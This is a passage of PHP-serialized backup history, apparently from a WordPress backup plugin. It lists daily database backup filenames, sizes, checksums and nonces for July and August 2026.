s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.7\";s:21:\"last_saved_by_version\";s:6:\"1.26.7\";s:12:\"is_multisite\";b:0;}i:1788053583;a:11:{s:2:\"db\";s:47:\"backup_2026-08-30-0133_AMB18_2a391d88e78e-db.gz\";s:7:\"db-size\";i:2536061;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"1fd2b1da781f9391813d542c9d96756b2a12e9f2\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"8abf88a36aaa26053ca9f8c13f28c12832ec4016f69935ccc2fe60509495e3a5\";}}s:5:\"nonce\";s:12:\"2a391d88e78e\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.7\";s:21:\"last_saved_by_version\";s:6:\"1.26.7\";s:12:\"is_multisite\";b:0;}i:1787966130;a:11:{s:2:\"db\";s:47:\"backup_2026-08-29-0115_AMB18_fe71ab2f8243-db.gz\";s:7:\"db-size\";i:2532797;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"91139d13ae363a241aae091b41fcd142d0e0831d\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"d959e5daeefe18a6f81118b7a843a5f843c39750195d1ca70b7b74f03b4ecf45\";}}s:5:\"nonce\";s:12:\"fe71ab2f8243\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.7\";s:21:\"last_saved_by_version\";s:6:\"1.26.7\";s:12:\"is_multisite\";b:0;}i:1787879613;a:11:{s:2:\"db\";s:47:\"backup_2026-08-28-0113_AMB18_10da8ddd6313-db.gz\";s:7:\"db-size\";i:2530648;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"51eb31f1c76ef5fc6ba977f66056834765fd3479\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"a48dc9f7f26e8dead46ecee86eb607dad07abccf87dd0bdaba5176d24a4b8764\";}}s:5:\"nonce\";s:12:\"10da8ddd6313\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.7\";s:21:\"last_saved_by_version\";s:6:\"1.26.7\";s:12:\"is_multisite\";b:0;}i:1787793279;a:11:{s:2:\"db\";s:47:\"backup_2026-08-27-0114_AMB18_7e4296862ab1-db.gz\";s:7:\"db-size\";i:2522144;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"6d1e2adf163a4400cfa9bd980b84a1817e697bff\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"615ae5277aaa6328462c9ff247983a1f0a95145719fe2d04833b38cdda650c58\";}}s:5:\"nonce\";s:12:\"7e4296862ab1\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.7\";s:21:\"last_saved_by_version\";s:6:\"1.26.7\";s:12:\"is_multisite\";b:0;}i:1787706668;a:11:{s:2:\"db\";s:47:\"backup_2026-08-26-0111_AMB18_74f56d8558aa-db.gz\";s:7:\"db-size\";i:2521268;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"da0c41dbe8c2788958d4c6cbc769d907c2ac9d9a\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"215590706ac9d8153f1283ae0c965548acfdbfbe4e829f0c1a7f14ee16057210\";}}s:5:\"nonce\";s:12:\"74f56d8558aa\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.7\";s:21:\"last_saved_by_version\";s:6:\"1.26.7\";s:12:\"is_multisite\";b:0;}i:1787620448;a:11:{s:2:\"db\";s:47:\"backup_2026-08-25-0114_AMB18_945790f10cd7-db.gz\";s:7:\"db-size\";i:2520232;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"3f05823e8f27589150854927e1394971b534dda8\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"53365564571e6a0ffb2cca87c2939c3f31d2bddbd18893a447d6d43725892fa4\";}}s:5:\"nonce\";s:12:\"945790f10cd7\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.7\";s:21:\"last_saved_by_version\";s:6:\"1.26.7\";s:12:\"is_multisite\";b:0;}i:1787533866;a:11:{s:2:\"db\";s:47:\"backup_2026-08-24-0111_AMB18_28bc849d61bd-db.gz\";s:7:\"db-size\";i:2504033;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"576852927d20d3b5aab3255e5126ace13e614dd9\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"31787022c60761b66baf21556922a4eb3ea4129c7db42946d2ee89e859c94e6c\";}}s:5:\"nonce\";s:12:\"28bc849d61bd\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.7\";s:21:\"last_saved_by_version\";s:6:\"1.26.7\";s:12:\"is_multisite\";b:0;}i:1787447648;a:11:{s:2:\"db\";s:47:\"backup_2026-08-23-0114_AMB18_e4b168ac81d9-db.gz\";s:7:\"db-size\";i:2498594;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"1de5cbabe226ccdac2c140c79053f1af0374019e\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"76b5cd0af4d7a48ab00b8c6314edbf5ff00db623610765fa90e6b96cf8e43efe\";}}s:5:\"nonce\";s:12:\"e4b168ac81d9\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.7\";s:21:\"last_saved_by_version\";s:6:\"1.26.7\";s:12:\"is_multisite\";b:0;}i:1787361050;a:11:{s:2:\"db\";s:47:\"backup_2026-08-22-0110_AMB18_30e9eb87374d-db.gz\";s:7:\"db-size\";i:2481069;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"95182af175f5634646b77abd9ca571374f3ad700\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"6b3512d9dcb4a762005470f56b90161313adf4286fb5ef37d511209dc78a7877\";}}s:5:\"nonce\";s:12:\"30e9eb87374d\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1787274685;a:11:{s:2:\"db\";s:47:\"backup_2026-08-21-0111_AMB18_c2b1e96def49-db.gz\";s:7:\"db-size\";i:2480742;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"43836d5052ca1c512d9d501ca461caca75efbb63\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"c90341f818d16414d054d321f31db301f3f237493f272dcdc880df22563a6a5a\";}}s:5:\"nonce\";s:12:\"c2b1e96def49\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1787188256;a:11:{s:2:\"db\";s:47:\"backup_2026-08-20-0110_AMB18_5105ff1a937c-db.gz\";s:7:\"db-size\";i:2478560;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"4234f4abb813aec9c3cbe7e465c0c9c9e2e4bc01\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"98b3ee2268522db1b7ac1b5633d5adc17e7eff5f5594ca9edeff0c7fb03498c5\";}}s:5:\"nonce\";s:12:\"5105ff1a937c\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1787101850;a:11:{s:2:\"db\";s:47:\"backup_2026-08-19-0110_AMB18_3d118a576ebf-db.gz\";s:7:\"db-size\";i:2477651;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"9a7de7c5514ca4e54dee01b8d81ffe7944bcea33\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"31d0f8840ce943249ad9d456941bc099e7ff3b5cd0ec09aa8101f8b2976b26d8\";}}s:5:\"nonce\";s:12:\"3d118a576ebf\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1787015450;a:11:{s:2:\"db\";s:47:\"backup_2026-08-18-0110_AMB18_22c289bae28a-db.gz\";s:7:\"db-size\";i:2476897;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"8583e21d830af3a2775f17a99920b1fd95e31ede\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"7423dfa146ef7abf7d2a70a67a4e2afe58aae3c0f0c94e59760841401bb01df3\";}}s:5:\"nonce\";s:12:\"22c289bae28a\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1786929060;a:11:{s:2:\"db\";s:47:\"backup_2026-08-17-0111_AMB18_3ab2bfd13b88-db.gz\";s:7:\"db-size\";i:2466873;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"306a13309c44c0edf8ba0d21a0e6c1173a13f18b\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"15f52020eca21309731aa0fa65b3c6fd64f8c9cd7cde5c636692995f30c603e5\";}}s:5:\"nonce\";s:12:\"3ab2bfd13b88\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1786842665;a:11:{s:2:\"db\";s:47:\"backup_2026-08-16-0111_AMB18_a2cac552d11d-db.gz\";s:7:\"db-size\";i:2464772;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"625c660b802249ca2af68ecb667f95c81b3d1d85\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"b184425b80dff2f0c41a8f97abe95d545bd0cbcc66dc48315d7a32be8144b5e9\";}}s:5:\"nonce\";s:12:\"a2cac552d11d\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1786756391;a:11:{s:2:\"db\";s:47:\"backup_2026-08-15-0113_AMB18_481f05bfe638-db.gz\";s:7:\"db-size\";i:2398195;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"6020d1a5d7df6224e640537490691c293f989a4d\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"ec8fe4e6d2b71bbd7d96bbee9b0dff6524a3d613b35d7c8e8c7a93e4e58396a3\";}}s:5:\"nonce\";s:12:\"481f05bfe638\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1786670061;a:11:{s:2:\"db\";s:47:\"backup_2026-08-14-0114_AMB18_4f7f3259412c-db.gz\";s:7:\"db-size\";i:2397453;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"d090d7baf84a1b5b480907c95adad8bd5a3b163e\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"bbfe9d43534758f052ae5d13570a57e0405c4d6ef19999492346071012611a6f\";}}s:5:\"nonce\";s:12:\"4f7f3259412c\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1786583592;a:11:{s:2:\"db\";s:47:\"backup_2026-08-13-0113_AMB18_30d2abe2fa01-db.gz\";s:7:\"db-size\";i:2392617;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"3698b83c67b2a59ceac39d78eacc914c36ea2f65\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"25a8f5efbaa509ec0ae2a7d2565cbb94771e302cbbb5c008e72a3a080346fa81\";}}s:5:\"nonce\";s:12:\"30d2abe2fa01\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1786497234;a:11:{s:2:\"db\";s:47:\"backup_2026-08-12-0113_AMB18_60bfa227b390-db.gz\";s:7:\"db-size\";i:2400653;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"870002eb6943ef32cdc7541ca97c950a9f6cc115\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"0c3bc82a633c884307577531927477d3bf37522eb7c1e02458a7f01c3f4ad118\";}}s:5:\"nonce\";s:12:\"60bfa227b390\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1786410685;a:11:{s:2:\"db\";s:47:\"backup_2026-08-11-0111_AMB18_2723094c3a63-db.gz\";s:7:\"db-size\";i:2402220;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"a44f344f4523e66043a5cc120374152208befd2f\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"b887002c08db0d9c29e6894a268714e3cdb32d0156dddd442113e5bdbbb0c2d0\";}}s:5:\"nonce\";s:12:\"2723094c3a63\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1786324259;a:11:{s:2:\"db\";s:47:\"backup_2026-08-10-0110_AMB18_79626cf17edf-db.gz\";s:7:\"db-size\";i:2401720;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"64b2546fc242e5a2ba818ce0bde71d2413a319d3\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"ee57c35fbbe11da0907b992d4910df3f2758e9d5b16dc26f22a11b73281378f3\";}}s:5:\"nonce\";s:12:\"79626cf17edf\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1786237882;a:11:{s:2:\"db\";s:47:\"backup_2026-08-09-0111_AMB18_86e1bbc46824-db.gz\";s:7:\"db-size\";i:2389929;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"bc6be68408c4ff12533acdad75392e1edf85a53a\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"3549e6e493dd757d5f6e3a67ec040ae453e9ce132321528cc444a3266d1ad79e\";}}s:5:\"nonce\";s:12:\"86e1bbc46824\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1786151473;a:11:{s:2:\"db\";s:47:\"backup_2026-08-08-0111_AMB18_68aab401126b-db.gz\";s:7:\"db-size\";i:2399288;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"e7db2c396a0df781e77871b2767994819900ccf1\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"136bb015f30417f41a076d241c79cad41d50c66b628f03462eb86948daffb9ed\";}}s:5:\"nonce\";s:12:\"68aab401126b\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1786065053;a:11:{s:2:\"db\";s:47:\"backup_2026-08-07-0110_AMB18_58804616f852-db.gz\";s:7:\"db-size\";i:2397767;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"7f04b727f47a420fa5290875ee04952bc06e6211\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"117ab54b1ab0d88d5da2dc1164d363af5e9bb4383e1ad6b047bf6c229b05223b\";}}s:5:\"nonce\";s:12:\"58804616f852\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1785978686;a:11:{s:2:\"db\";s:47:\"backup_2026-08-06-0111_AMB18_cf29ce6f28e6-db.gz\";s:7:\"db-size\";i:2388729;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"2965ba89e7771d8f010cb7e2eed610010594d98d\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"7ba01c58c625a9f9dce8652352f5b2d4fd92808b7a3beb4c2e0ec91bc3048e20\";}}s:5:\"nonce\";s:12:\"cf29ce6f28e6\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.6\";s:21:\"last_saved_by_version\";s:6:\"1.26.6\";s:12:\"is_multisite\";b:0;}i:1785892411;a:11:{s:2:\"db\";s:47:\"backup_2026-08-05-0113_AMB18_92ddb5bdab97-db.gz\";s:7:\"db-size\";i:2396117;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"00631ad40c326c69fd2e913131ef723219bd56f7\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"76c84915c5477bbe822d958be70675a0eacdeeba5ab163664e477dffc107a069\";}}s:5:\"nonce\";s:12:\"92ddb5bdab97\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.5\";s:21:\"last_saved_by_version\";s:6:\"1.26.5\";s:12:\"is_multisite\";b:0;}i:1785805860;a:11:{s:2:\"db\";s:47:\"backup_2026-08-04-0111_AMB18_94b12f25ce72-db.gz\";s:7:\"db-size\";i:2395318;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"e66ec7410aace99b9cad4e9b6fb47fc1698b6d84\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"c286bfa76425eb55a6cd3c38f0c8e49e55a0be52128242058da0ed2787c0bedc\";}}s:5:\"nonce\";s:12:\"94b12f25ce72\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.5\";s:21:\"last_saved_by_version\";s:6:\"1.26.5\";s:12:\"is_multisite\";b:0;}i:1785719710;a:11:{s:2:\"db\";s:47:\"backup_2026-08-03-0115_AMB18_38e8d0c39489-db.gz\";s:7:\"db-size\";i:2391592;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"f3fbed986dd145449efa9a1dccad446dbd9c0c5a\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"8bdc083ce1d2ef4521ca0dec60efb35b4b46dfd091e3a3f72d7c9d4b88fd447f\";}}s:5:\"nonce\";s:12:\"38e8d0c39489\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.5\";s:21:\"last_saved_by_version\";s:6:\"1.26.5\";s:12:\"is_multisite\";b:0;}i:1785633105;a:11:{s:2:\"db\";s:47:\"backup_2026-08-02-0111_AMB18_831ca63766f6-db.gz\";s:7:\"db-size\";i:2389318;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"c6055477167e98bd8e9a4c07931d1594abde2f64\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"637e507bf1d484c5d40e43d846f2f3b86ae300dbbceab8c04f6c7efd489f400f\";}}s:5:\"nonce\";s:12:\"831ca63766f6\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.5\";s:21:\"last_saved_by_version\";s:6:\"1.26.5\";s:12:\"is_multisite\";b:0;}i:1785546736;a:11:{s:2:\"db\";s:47:\"backup_2026-08-01-0112_AMB18_bb6b86f1fb2a-db.gz\";s:7:\"db-size\";i:2385022;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"833553ffc34378230c0268d87081d16bdc8fa91c\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"fa8fcf853c8c367cb1a55abfeaf7f288e4ec2ec4d3c8146481231e85ca401c5e\";}}s:5:\"nonce\";s:12:\"bb6b86f1fb2a\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.5\";s:21:\"last_saved_by_version\";s:6:\"1.26.5\";s:12:\"is_multisite\";b:0;}i:1785460428;a:11:{s:2:\"db\";s:47:\"backup_2026-07-31-0113_AMB18_c710321e37b1-db.gz\";s:7:\"db-size\";i:2384073;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"016f13084e53d84d92855c338778c25cdb57037f\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"5dee26a88c72919051872c272ffd0416d51d7fb80e95ec8f14932d4e49203661\";}}s:5:\"nonce\";s:12:\"c710321e37b1\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.5\";s:21:\"last_saved_by_version\";s:6:\"1.26.5\";s:12:\"is_multisite\";b:0;}i:1785374065;a:11:{s:2:\"db\";s:47:\"backup_2026-07-30-0114_AMB18_2efba7b95bcc-db.gz\";s:7:\"db-size\";i:2379211;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"81e0e10f0025b75d683c198ac21c2ccf0afc9e72\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"5c2fce6746c05c122f5d2df3473444302fbc353365e9163883aedb9734ac8200\";}}s:5:\"nonce\";s:12:\"2efba7b95bcc\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.5\";s:21:\"last_saved_by_version\";s:6:\"1.26.5\";s:12:\"is_multisite\";b:0;}i:1785287632;a:11:{s:2:\"db\";s:47:\"backup_2026-07-29-0113_AMB18_38ad7c280d41-db.gz\";s:7:\"db-size\";i:2378675;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"fb4a7812b704a8a40420cc7fca2e2a603d03e318\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"e14d1d35b64f8805b14cd3ba3a07322e0497021e4f1d844c02b31f37c90598a6\";}}s:5:\"nonce\";s:12:\"38ad7c280d41\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.5\";s:21:\"last_saved_by_version\";s:6:\"1.26.5\";s:12:\"is_multisite\";b:0;}i:1785201241;a:11:{s:2:\"db\";s:47:\"backup_2026-07-28-0114_AMB18_e93e4c96efde-db.gz\";s:7:\"db-size\";i:2378329;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"507d6a0bbea5e1a8b658e9a8f773100fec651a3c\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"b642c3590264d956a5099bbcd9f8f5bd4f406489dfeb05dd7632cd0dce86a507\";}}s:5:\"nonce\";s:12:\"e93e4c96efde\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.5\";s:21:\"last_saved_by_version\";s:6:\"1.26.5\";s:12:\"is_multisite\";b:0;}i:1785114872;a:11:{s:2:\"db\";s:47:\"backup_2026-07-27-0114_AMB18_7bdb44249e87-db.gz\";s:7:\"db-size\";i:2373878;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"af57076257896b8cad8a71dbb5cf2601883ae031\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"0da823b559f99ad0991938a9ad9faf7bcb18b401df2a60ac362bfb211f79a4d2\";}}s:5:\"nonce\";s:12:\"7bdb44249e87\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.5\";s:21:\"last_saved_by_version\";s:6:\"1.26.5\";s:12:\"is_multisite\";b:0;}i:1785028527;a:11:{s:2:\"db\";s:47:\"backup_2026-07-26-0115_AMB18_d1d7a3ef65d6-db.gz\";s:7:\"db-size\";i:2364222;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"df70a4d7fca20d2aea60f16b6baea3ff8dea8153\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"e8fdd7344fd082b29ad4548d638f8775e5f3cffa5c3d574ce1e4a3f8befbdf1c\";}}s:5:\"nonce\";s:12:\"d1d7a3ef65d6\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.5\";s:21:\"last_saved_by_version\";s:6:\"1.26.5\";s:12:\"is_multisite\";b:0;}i:1784947794;a:11:{s:2:\"db\";s:47:\"backup_2026-07-25-0249_AMB18_0e59cdfb5707-db.gz\";s:7:\"db-size\";i:2363942;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"1a8ddf44a2bc7ef3d0a2d12cbb1f25ec42cfc308\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"e3d4323118f68cc260667be28854710030629cb7351cfba97e09975859f019cd\";}}s:5:\"nonce\";s:12:\"0e59cdfb5707\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.5\";s:21:\"last_saved_by_version\";s:6:\"1.26.5\";s:12:\"is_multisite\";b:0;}i:17